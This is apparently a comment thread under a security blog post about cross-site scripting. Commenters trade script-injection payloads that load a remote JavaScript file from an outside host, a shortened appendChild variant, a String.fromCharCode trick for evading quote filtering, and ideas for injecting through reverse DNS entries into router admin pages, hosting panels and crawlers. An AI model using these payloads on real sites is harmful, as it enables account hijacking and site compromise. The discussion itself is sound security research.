Making a script tag load an arbitrary remote script file without a space:

    <script>s=document.createElement("script");
            s.setAttribute("src","http://www.skullsecurity.org/test-js.js");
            document.body.appendChild(s)<script>

For our convenience I put newlines in, just remove them. I checked it on the javascript: line (where you have to add javascript:, surround it with void(), and change the semicolons to commas). If that doesn't exactly work, something like it could. Any JS framework with the ability to use objects to set attributes on a new tag could be written more concisely but this doesn't depend on any frameworks.

appendChild returns the appended child, so you can shorten that to the following:

    <script>document.body.appendChild(document.createElement("script")).src="http://www.skullsecurity.org/test-js.js"</script>

String.fromCharCode() can also be useful when some characters are stripped/escaped (such as quotes).

   document.write(String.fromCharCode(72,69,76,76,79));

The reverse DNS bit would be amazing. Do a bobby tables on it and watch sites fall just from visiting them.

Of course I wouldn't -do- such a thing, but it would be crazy to see.

They really mean it when they say "never trust user input".

Even though he only brings it up at the end reverse DNS entries could end up being the scariest.

Other potential attack targets: admin UIs for routers, webhosting cpanels, web crawlers with DNS cache.